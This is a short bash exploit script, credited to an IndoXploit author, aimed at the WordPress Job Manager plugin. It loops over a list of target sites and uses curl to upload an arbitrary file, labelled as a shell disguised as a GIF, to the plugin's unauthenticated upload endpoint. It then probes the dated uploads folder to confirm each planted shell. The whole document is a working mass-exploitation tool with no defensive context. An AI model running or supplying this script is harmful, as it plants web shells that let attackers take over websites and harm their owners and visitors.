WordPress Plugin Job Manager File Upload

1. #!/bin/bash
2. # Coded by L0c4lh34rtz - IndoXploit
3.  
4. args=("$@")
5. target=$(pwd)"/"${args[0]}
6. file_=$(pwd)"/"${args[1]}
7. tgl=$(date +"%Y")
8. bln=$(date +"%m")
9.  
10. if [ -z "$2" ]
11.     then
12.     echo "usage: wpjob.sh target.txt shell.gif"
13. else
14.     for url in $(cat $target)
15.     do
16.         echo "[+] Scanning $url"
17.         vuln="$url/jm-ajax/upload_file/"
18.         shell="$url/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/"$(basename "$file_")
19.  
20.         curl -s --connect-timeout 10 -k -H "User-Agent: indoxploit" -F "file=@$file_" "$vuln" -o /dev/null
21.         check=$(curl -s -k -w "%{http_code}" -H "User-Agent: indoxploit" "$shell" -o /dev/null)
22.  
23.         if (($check == 200))
24.             then
25.             echo -e "\e[92m$shell\e[0m"
26.         fi
27.     done
28. fi